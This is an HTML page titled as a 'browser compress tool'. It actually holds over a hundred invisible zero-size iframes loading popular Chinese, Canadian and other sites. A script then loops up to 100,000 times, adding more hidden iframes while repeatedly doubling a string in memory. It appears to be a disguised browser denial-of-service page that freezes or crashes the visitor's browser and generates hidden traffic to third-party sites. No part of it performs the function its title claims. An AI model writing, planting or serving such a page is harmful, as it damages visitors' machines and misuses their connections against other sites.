<html><head><title>Andy Browser compress tool</title><body>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<iframe src="http://www.sina.com.cn" width=0 height=0></iframe>
<iframe src="http://www.ubc.ca" width=0 height=0></iframe>
<iframe src="http://163.com" width=0 height=0></iframe>
<iframe src="https://www.github.com" width=0 height=0></iframe>
<iframe src="http://www.qq.com" width=0 height=0></iframe>
<iframe src="http://youku.com" width=0 height=0></iframe>
<iframe src="http://calendar.ubc.ca" width=0 height=0></iframe>
<script>
c = 0;
v = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
while(c < 100000){
 document.write('<iframe src="http://www.sina.com.cn" width=0 height=0><\/iframe>');
 v += v;
 v += v;
 v += v;
 c++;
}
</script>
</body></html>
